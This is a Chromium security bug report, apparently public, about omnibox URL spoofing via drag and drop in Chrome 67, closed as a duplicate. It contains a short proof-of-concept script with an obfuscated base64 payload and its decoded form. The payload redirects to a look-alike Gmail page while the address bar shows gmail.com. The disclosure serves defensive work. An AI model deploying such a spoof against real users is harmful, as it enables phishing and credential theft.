New issue
Advanced search Search tips

Issue 863287 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 698156
Owner: ----
Closed: Jul 13
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 3
Type: Bug-Security



Sign in to add a comment

Security: Chrome Omnibox Spoofing with Drag&Drop

Reported by xis...@gmail.com, Jul 13

Issue description

VULNERABILITY DETAILS
When navigation succeeds, the Drag&Drop‘s URL is always shown in the omnibox and fails to refresh on navigation.

VERSION
Chrome Version: 67.0.3396.99+[Stable]
Operating System: [Windows]

REPRODUCTION CASE
Drag and drop links to the current TAB.

POC:

<script>
document.addEventListener("dragend", function() {
document.write(atob('PGgxPlNwb29mPC9oMT4KPHNjcmlwdD4KbG9jYXRpb249J2h0dHA6Ly94aXNpZ3IuY29tL3Rlc3QxOTk1L0dtYWlsLmh0bSc7Ci8vbG9jYXRpb249J2h0dHBzOi8vYXBwbGUuY29tJzsKPC9zY3JpcHQ+Cgo='));
document.write('<title>Google</title>');
});
</script>

<p>
Drag and drop links to the current TAB.
</p>
<a href="https://www.gmail.com/">www.gmail.com</a> 
 
base64 decode:
<h1>Spoof</h1>
<script>
location='http://xisigr.com/test1995/Gmail.htm';
//location='https://apple.com';
</script>
 
Cc: creis@chromium.org
Components: UI>Browser>Navigation UI>Browser>Omnibox
Labels: Security_Severity-Low M-70 OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
Status: Available (was: Unconfirmed)
Mergedinto: 698156
Status: Duplicate (was: Available)
(oops, hit Enter too soon)
This looks identical to  issue 698156 , though please do let me know if I'm missing something. We would like to do something to differentiate pending navigations from those that have committed (besides the lock icon, which is a mitigating factor in this attack), but we're not quite sure yet what to do that users will realistically notice/understand.
Cc: emilyschechter@chromium.org edwardjung@chromium.org maxwalker@chromium.org
Project Member

Comment 4 by sheriffbot@chromium.org, Oct 20

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment